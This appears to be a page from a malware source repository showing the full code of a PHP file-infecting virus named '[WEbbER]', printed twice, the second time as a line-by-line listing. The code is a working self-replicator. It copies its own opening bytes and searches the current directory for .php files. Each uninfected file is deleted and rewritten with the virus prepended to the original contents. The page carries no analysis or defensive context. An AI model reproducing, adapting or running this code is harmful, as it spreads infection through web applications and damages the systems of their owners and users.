MalwareSourceCode/PHP/Virus.PHP.Rebber

<?php
function webb()
{
//[WEbbER] by MI_pirat
//Copyright (C) 2002 [Red-Cell] inc.
$c = "";
//Get the virus from the host file
$f = fopen (__FILE__, "r");
$c = fread ($f, filesize (__FILE__));
fclose ($f);
$c = substr($c,0,866);
//Search for files to infect
$handle=opendir('.');
while (($file = readdir($handle))!==false) {
if ($file != "." && $file != "..") 
 {
$s = substr($file, -3);
//If not infected yet, infect it!
if ($s=="php") 
   {
	$g = fopen ($file, "r"); 
	$cont = fread ($g,filesize ($file));      
	fclose ($g);
	if (!strstr($cont,"[WEbbER]")) //check the signature
	{
	unlink("$file"); //delete and prepend the virus
	$g = fopen ($file, "a+"); 
	fwrite ($g,"$c");      	
	fwrite ($g,"\n");
	fwrite ($g,substr($cont,5)); //append the original file
	fclose ($g);
	}
   }

 }

}

closedir($handle); 
}
webb();
?>
Add files via upload 2020-10-10 03:05:41 +00:00			`<?php`
			`function webb()`
			`{`
			`//[WEbbER] by MI_pirat`
			`//Copyright (C) 2002 [Red-Cell] inc.`
			`$c = "";`
			`//Get the virus from the host file`
			`$f = fopen (__FILE__, "r");`
			`$c = fread ($f, filesize (__FILE__));`
			`fclose ($f);`
			`$c = substr($c,0,866);`
			`//Search for files to infect`
			`$handle=opendir('.');`
			`while (($file = readdir($handle))!==false) {`
			`if ($file != "." && $file != "..")`
			`{`
			`$s = substr($file, -3);`
			`//If not infected yet, infect it!`
			`if ($s=="php")`
			`{`
			`$g = fopen ($file, "r");`
			`$cont = fread ($g,filesize ($file));`
			`fclose ($g);`
			`if (!strstr($cont,"[WEbbER]")) //check the signature`
			`{`
			`unlink("$file"); //delete and prepend the virus`
			`$g = fopen ($file, "a+");`
			`fwrite ($g,"$c");`
			`fwrite ($g,"\n");`
			`fwrite ($g,substr($cont,5)); //append the original file`
			`fclose ($g);`
			`}`
			`}`

			`}`

			`}`

			`closedir($handle);`
			`}`
			`webb();`
			`?>`